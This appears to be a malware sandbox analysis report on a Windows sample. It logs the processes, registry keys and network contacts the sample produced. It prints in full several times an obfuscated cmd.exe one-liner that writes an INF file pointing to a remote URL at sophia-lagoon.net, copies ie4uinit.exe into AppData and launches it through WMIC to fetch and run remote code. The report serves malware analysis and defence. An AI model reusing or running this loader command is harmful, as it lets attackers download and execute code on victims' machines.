Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474BFD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474BFD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-USn

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v /c set "lucky50=e" && set "lucky5=$w" && set "lucky03=version" && set "lucky10=d" && (for %u in (a) do @set "lucky87=%~u") && set "lucky41=fast" && call set "lucky59=%lucky41:~2,1%" && set "lucky85=init" && set "lucky7=t" && set "lucky26=." && set "lucky23=settings" && set "lucky55=si" && (for %q in (c) do @set "lucky29=%~q") && set "lucky65=!lucky26!inf" && set "lucky15=ieu!lucky85!!lucky65!" && call !lucky59!et "lucky11=%app!lucky10!ata%\micro!lucky59!oft\" && !lucky59!et "lucky8=!lucky11!!lucky15!" && (for %p in ("[!lucky03!]" "signature = !lucky5!indows nt$" "[!lucky10!e!lucky59!tinationdirs]" "e4139c=01" "[!lucky10!efaultin!lucky59!tall.windows7]" "unregis!lucky7!erocxs=a687d4" "!lucky10!elfil!lucky50!s=e4139c" "[a687d4]" "%11%\scro\" "%lucky51%j,ni,%lucky21%%lucky0%%lucky0%p%lucky1%%lucky9%%lucky9%sophia-lagoon!lucky26!%lucky56%/81754783" "[e4139c]" "ieu%lucky69%!lucky65!" "[!lucky59!!lucky7!rings]" "lucky69=!lucky85!" "lucky0=t;lucky40" "!lucky59!ervicen!lucky87!me=' '" "lucky21=h" "lucky1=:;lucky35" "lucky9=/" "!lucky59!hortsvcn!lucky87!me=' '" "lucky56=net" "lucky51=b;lucky67" "lucky25=%time%") do @e!lucky29!ho %~p)>"!lucky8!" && !lucky59!et "lucky2=ie4u!lucky85!.!lucky50!xe" && call xcopy /y /c /q %win!lucky10!ir%\!lucky59!ystem32\!lucky2! "!lucky11!*" \| set lucky93=nation && !lucky59!t!lucky87!rt "" wmi!lucky29! proce!lucky59!s call !lucky29!rea!lucky7!e "!lucky11!!lucky2! -base!lucky23!" \| set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn"	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"	Jump to behavior

Screenshots

Behavior

Click here to start
Slideshow Behavior Animation

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.11.222.59	sophia-lagoon.net	United States		54290	HOSTWINDSUS	false

Contacted Domains

Name	IP	Active
sophia-lagoon.net	142.11.222.59	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://sophia-lagoon.net/81754783	false	Avira URL Cloud: safe	unknown

Source:	Binary string: ie4uinit.pdbGCTL source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
Source:	Binary string: ie4uinit.pdb source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr

Creates COM task schedule object (often to register a task for autostart)

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474C003000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1525429471.000002474C00E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sophia-lagoon.net/81754783
Source: ie4uinit.exe, 00000013.00000003.1525429471.000002474C031000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1580755717.000002474C033000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sophia-lagoon.net/81754783WWC:
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474C003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sophia-lagoon.net/81754783lP
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: http://www.baidu.com/favicon.icohttps://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=
Source: ie4uinit.exe, 00000013.00000002.1582941785.000002474C01E000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1580755717.000002474C01A000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1525429471.000002474C00E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: https://www.baidu.com/s?tn=80035161_2_dg&wd=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query=

Source: unknown

DNS traffic detected: queries for: sophia-lagoon.net

Source: global traffic

System Summary

Very long command line found

Source: unknown

Process created: Commandline size = 2790

Contains functionality to create processes via WMI

Source: WMIC.exe, 00000011.00000002.1515062774.000001AF64030000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: C:\Windows\system32\C:\Windows\System32\Wbem\WMIC.exewmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" Winsta0\Default

Deletes files inside the Windows folder

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

File deleted: C:\Windows\Temp\OLDF396.tmp

Jump to behavior

Source: C:\Windows\System32\xcopy.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /v /c set "Lucky50=e" && set "Lucky5=$w" && set "Lucky03=version" && set "Lucky10=d" && (for %u in (a) do @set "Lucky87=%~u") && set "Lucky41=Fast" && call set "Lucky59=%Lucky41:~2,1%" && set "Lucky85=init" && set "Lucky7=t" && set "Lucky26=." && set "Lucky23=settings" && set "Lucky55=si" && (for %q in (c) do @set "Lucky29=%~q") && set "Lucky65=!Lucky26!inf" && set "Lucky15=ieu!Lucky85!!Lucky65!" && call !Lucky59!et "Lucky11=%app!Lucky10!ata%\micro!Lucky59!oft\" && !Lucky59!et "Lucky8=!Lucky11!!Lucky15!" && (for %p in ("[!Lucky03!]" "signature = !Lucky5!indows nt$" "[!Lucky10!e!Lucky59!tinationdirs]" "E4139C=01" "[!Lucky10!efaultin!Lucky59!tall.windows7]" "UnRegis!Lucky7!erOCXs=A687D4" "!Lucky10!elfil!Lucky50!s=E4139C" "[A687D4]" "%11%\scro\" "%Lucky51%j,NI,%Lucky21%%Lucky0%%Lucky0%p%Lucky1%%Lucky9%%Lucky9%sophia-lagoon!Lucky26!%Lucky56%/81754783" "[E4139C]" "ieu%Lucky69%!Lucky65!" "[!Lucky59!!Lucky7!rings]" "Lucky69=!Lucky85!" "Lucky0=t;Lucky40" "!Lucky59!ervicen!Lucky87!me=' '" "Lucky21=h" "Lucky1=:;Lucky35" "Lucky9=/" "!Lucky59!hortsvcn!Lucky87!me=' '" "Lucky56=net" "Lucky51=b;Lucky67" "Lucky25=%time%") do @e!Lucky29!ho %~p)>"!Lucky8!" && !Lucky59!et "Lucky2=ie4u!Lucky85!.!Lucky50!xe" && call xcopy /Y /C /Q %win!Lucky10!ir%\!Lucky59!ystem32\!Lucky2! "!Lucky11!*" \| set Lucky93=Nation && !Lucky59!t!Lucky87!rt "" wmi!Lucky29! proce!Lucky59!s call !Lucky29!rea!Lucky7!e "!Lucky11!!Lucky2! -base!Lucky23!" \| set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
